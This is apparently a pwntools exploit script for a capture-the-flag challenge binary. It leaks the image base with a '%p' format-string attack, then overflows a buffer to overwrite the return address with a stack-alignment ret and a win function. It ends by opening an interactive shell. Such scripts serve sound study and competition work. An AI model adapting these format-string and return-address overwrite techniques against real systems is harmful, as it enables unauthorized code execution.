import os
import re
import sys

from pwn import *
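# Hard-coded for this challenge binary; they must be re-derived if the
# binary is rebuilt.  LEAK_INDEX is the position, in the space-split output
# of the witch-name leak, of the pointer we use to locate the image base.
LEAK_INDEX = 41
LEAK_OFFSET = 2537     # leaked pointer minus image base (kept in decimal as in the original)
WIN_OFFSET = 0x9ec     # win function, relative to the image base
RERET_OFFSET = 0x0b2d  # lone `ret` used to re-align the stack, relative to the image base


def _connect():
    """Open a tube to the target and return it.

    With pwntools ``args.debug`` set, a plain ncat to localhost:1024 is used.
    Otherwise the challenge instance ID must be the first positional argument;
    it is spliced into the TLS hostname.  Exits with status 1 on a missing or
    malformed ID.
    """
    if args.debug:
        # NOTE(review): pwntools only parses uppercase KEY=value tokens into
        # `args`, so `args.debug` may never be settable from the command line
        # -- confirm; `args.LOCAL`-style names are the usual convention.
        return process(["ncat", "localhost", "1024"])
    if len(sys.argv) < 2:
        print("USAGE: exploit.py <ID>")
        sys.exit(1)
    instance_id = sys.argv[1]
    # The ID ends up inside a hostname.  Restrict it to hostname characters so
    # a stray value cannot turn into extra ncat arguments or a different host.
    if not re.fullmatch(r"[A-Za-z0-9-]+", instance_id):
        print("Invalid <ID>: expected only letters, digits and '-'")
        sys.exit(1)
    host = "{}-1024-intro-pwn-1.challenge.cscg.live".format(instance_id)
    # Build argv as a list rather than format-then-split so ncat receives
    # exactly these four arguments regardless of the ID's content.
    return process(["ncat", "--ssl", host, "1337"])


def _leak_base(p):
    """Run the format-string leak and return the image base.

    Sends 50 ``%p`` specifiers as the witch name, prints every leaked slot
    for inspection, and derives the base from slot LEAK_INDEX.  Exits with
    status 1 if that slot is missing or is not a hex pointer (e.g. ``(nil)``),
    which is the usual symptom of the leak layout having shifted.
    """
    p.recvuntil(b"Enter your witch name:")
    p.sendline(b"%p " * 50)
    leaked = p.recvuntil(b"enter your magic spell:")
    # The leak is ASCII; replace rather than crash on any stray byte.
    leak_vals = leaked.decode(errors="replace").split(" ")
    for i, v in enumerate(leak_vals):
        print(i, "->", v)
    if len(leak_vals) <= LEAK_INDEX or not leak_vals[LEAK_INDEX].startswith("0x"):
        print("Leak slot {} is not a pointer; the %p layout may have changed".format(LEAK_INDEX))
        sys.exit(1)
    return int(leak_vals[LEAK_INDEX], 16) - LEAK_OFFSET


def _send_payload(p, base):
    """Send the spell that overflows into the return address and calls win.

    ``base`` is the image base from :func:`_leak_base`.  The payload is sent
    as one write so the target cannot consume a partial payload on a short
    read.
    """
    win = base + WIN_OFFSET
    extra_ret = base + RERET_OFFSET
    print("RERET:", hex(extra_ret))
    print("WIN:", hex(win))
    # The NUL presumably terminates "Expelliarmus" for a C-style string
    # compare while the 251 padding bytes still run the buffer over up to the
    # saved return address -- that count is tied to this binary's frame
    # layout; confirm against the disassembly if the binary changes.
    #
    # Why return twice?  Code reached via win may execute `movaps xmmword ptr`
    # against the stack, which faults unless rsp is 16-byte aligned at that
    # point.  Returning through a lone `ret` first pops another 8 bytes and
    # restores the alignment the overwritten return address broke.
    payload = (
        b"Expelliarmus\x00"
        + b"A" * 251
        + p64(extra_ret)
        + p64(win)
        + b"\n"
    )
    p.send(payload)


def main():
    """Connect, leak the image base, fire the overflow and drop to a shell."""
    p = _connect()
    base = _leak_base(p)
    _send_payload(p, base)
    p.interactive()


if __name__ == "__main__":
    main()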